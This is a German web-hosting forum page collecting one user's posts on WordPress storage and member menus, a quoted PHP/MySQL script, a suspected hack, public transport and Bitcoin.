    Zu beachten ist auch, dass WP zu jeder hochgeladenen Grafik weitere Dateien mit anderen Abmessungen erzeugt.

    Insgesamt finde ich es aber trotzdem erstaunlich, dass soviel Platz verbraucht wird, denn bei einer schnellen Durchsicht von lutz-bathe.de habe ich gar nicht so viele eingebundene Grafiken gefunden.
  • in: Webseiten Analysieren

    geschrieben von mein-wunschname

    OT: Wenn du schon deinen Code so formatierst, dass man ihn denkbar schlecht lesen kann, dann posten ihn doch hier wenigstens so:
    <?php
    include './sql.php';
    sturl();
    
    function sturl(){
    global $host, $user, $db, $pass, $table2, $table3, $currentdate;
    //Check
    $mysqli = new mysqli($host, $user, $pass, $db);
    $select = "SELECT url from $table2)";
    $resultu = $mysqli->query($select);
    if (mysqli_num_rows($resultu) == 0){
    //RESET//RESET//RESET//RESET//RESET//RESET//RESET//RESET//RESET//RESET//RESET//RESET//RESET//RESET//RESET//RESET//RESET//RESET//RESET//RESET//RESET//RESET//RESET//
    //Datenbank 1 zurücksetzen
    $mysqli = new mysqli($host, $user, $pass, $db);
    $format = "TRUNCATE TABLE $table2)";
    $result0 = $mysqli->query($format);
    
    //Datenbank 2 laden:
    $mysqli = new mysqli($host, $user, $pass, $db);
    $select = "SELECT url from $table3)";
    $result1 = $mysqli->query($select);
    while($row = $result->fetch_array())
    {
    $rows[] = $row;
    $urls[$x]= $row[0];
    $x = $x+1;
    }


    Das sind nur 4 Zeichen Zusatzaufwand.
  • in: Eventueller Hacker Angriff ?

    geschrieben von mein-wunschname

    thekings-gruppe schrieb:
    Also ich bin vor 3 Stunden auf PHP 7.0 gezogen das stimmt. Aber nein ich war auf keiner Seite.

    Aber er wurde einfach so erstellt, als ich auf keiner Seite war. Das ist ja gerade das was mich verwundert


    Wenn du deine Seite nicht besucht hast, bedeutet das ja nicht, dass nicht jemand anderes drauf war. Irgendwelche guten oder nicht so guten Bots schauen schnell mal vorbei. Die finden zwar nichts aber auch ein leeres Verzeichnis muss durch den Webserver verarbeitet werden und vermutlich schaut auch der PHP-Interpreter mal kruz rein, ob es für ihn etwas zu tun gibt.
    Das wird dann dazu führen, dass ein Verzeichnis angelegt wird, in dem nichts drin steht.
  • in: WordPress Mitgliederbereich

    geschrieben von mein-wunschname

    turmfalken-nikolai schrieb:
    ...

    Inwieweit sich die Sichtbarkeit da einstellen läßt kann ich jetzt nicht sagen da ich bei mir solch einen Bereich nicht habe.


    Ja, das ist aber genau der Punkt. Ich habe aber inzwischen die nur für Mitglieder relavanten Mnüpunkte schon mal zusammen gefasst.
    Außerdem habe ich das Plugin If Menu gefunden, das scheint so etwas zu sein was ich brauche, denn es wird beschrieben
    Display a menu item only if current User is logged in

    Danke auf jeden Fall für die Hinweise.
  • in: WordPress Mitgliederbereich

    geschrieben von mein-wunschname

    Ich habe vor kurzem die Betreuung einer Vereinswebsite übernommen, Software ist Wordpress. Es gibt Seiten, die für die Öffentlichkeit bestimmt sind und andere nur für Mitglieder. Diese Seiten für Mitglieder sind Passwortgeschütz. Da diese geschützten Seiten aber auch in der Navi sind ist es für normale Besucher etwas nervig, wenn man bei jedem 2 Link auf eine Seite kommt, bei dem man zu einer PW-Eingabe aufgefordert wird.

    Meine Idee ist jetzt, so eine Art Mitgliederbereich zu erstellen. Kernpunkt dabei ist, dass dann für angemeldete Leser eine andere erweiterte oder zusätzliche Navi sichtbar ist. Hat jemand eine Idee, wie man so etwas umsetzen kann?
  • in: Verdienst und Leistung

    geschrieben von mein-wunschname

    john-gunn schrieb:
    Wenn ich obendrein höre, daß in Deutschland 41% der Fläche für Wohnen und 51% für den Strassenverkehr bereit gehalten werden, wird das nicht gerade besser.


    Zum Glück hat D mehr als 100% Fläche, denn 30% sind schon Wald und 50% für die Landwirtschaft

    john-gunn schrieb:
    ...
    Glücklicherweise arbeiten bei uns im Pott mehrere Gruppen daran den ÖPNV ticketfrei zu machen. Danach kann man dafür sorgen, daß in der Stadt die Masse der Autos deutlich reduziert wird.



    Das ist eine gute Idee. Ich bin vor 2 Jahren im Sommer mal in Frankreich von den Pyrenäen nach Perpignan mit dem Bus gefahren, so 150 km, fast 3h Fahrzeit. Der Fahrpreis betrug genau 1 EUR, ein symbolischer Preis gewissermaßen. Ein einheimischer Fahrgast im Bus meinte, dass man das macht, um die teils engen Straßen im Gebirge von gebirgsunerfahrenen Autofahrer, die den einheimischen Verkehr behindern, zu entlasten.

    Wenn man aber in meiner Stadt ticketfreien ÖPNV einführen würde und es infolge dessen zu einem Anstieg der Fahrgastzahlen kommen würde, dann bräche das Chaos aus, denn das System ist im Berufsverkehr schon jetzt an der Grenze, zumindest während der Hauptpendlerzeiten. Es wären also erst einmal massive Investitionen notwendig, um das Gesamtsystem auszubauen. Oder man macht das nach der Tokioter Methode:

  • in: Verdienst und Leistung

    geschrieben von mein-wunschname

    Schnäppchenjäger wie du sie hier beschreibst
    john-gunn schrieb:
    Ja, kommt einer zu mir und schließt mit mir einen Vertrag ab. Wenn ich unterschreibe, bekomme ich zwei Handys und ein Laptop, habe dafür einen Vertrag mit der Telekoom und muß für mindestens ein Jahr ca50€ jeden Monat blechen.

    kaufen jetzt auch Bitcoin.

    Willst du damit
    john-gunn schrieb:
    Kann man jetzt auch hingehen und sagen: Ist eine neue Recheneinheit. Mindestens einer hat daran verdient, nämlich der Typ, der die Idee hatte und die armen Blödmännern wie mir verkauft hat. Super!

    sagen, dass du ein Blödmann bist?

    Kannst du mal bitte auf die hier
    john-gunn schrieb:
    Aber hier werden im großen Stil nicht nur die armen Schweine geschädigt, die darauf reinfallen sondern in ebenso umfangreichen Teilen der Wert von Dingen, die wirklich einen solchen haben immer weiter ausgehöhlt und das schadet uns allen.

    beschriebene genannte Aushöhlung des Wertes von Dingen näher eingehen. Wie funktioniert die? Hast du mal ein Beispiel?

    Das
    john-gunn schrieb:
    Was Du nämlich nicht verstanden hast, ist worum es in diesem Thread eigentlich geht, daß da viel zu viele Leute rumlaufen, die Luftkotelett mit Nebelsauce servieren, als daß das überhaupt noch lange gut gehen kann.

    kann gut sein. Ich habe nur geringe Schulbildung und bin vermutlich nicht so belesen wie du.




  • in: Verdienst und Leistung

    geschrieben von mein-wunschname

    Du scheinst ja schon alles zu wissen, aber deine Ausführungen scheinen eher darauf hinzudeuten, dass du es nicht verstanden hast.
    Bitcoin sind eher so etwas wie das Muschelgeld der Neuzeit, einfach eine Recheneinheit. Das schon seit einiger Zeit "große" Akteure dort eingestiegen sind, ist eine andere Frage. Endet vielleicht ähnlich wie der Tulpenwahn vor fast 400 Jahren.
  • in: Habe Maleware auf der Page! HILFE!

    geschrieben von mein-wunschname

    Danke, dass du dich noch einmal zurückmeldest. Die Nachricht bei Heise und auch die Diskussion dazu sind sehr informativ bzw. interessant. Ich glaube, dass sich nur wenige WordPress-Nutzer bewusst sind, wie viel Unsicherheitspotential in diesem CMS steckt. Kann bei anderen aber natürlich auch sein.

Login zum Webhosting ohne Werbung!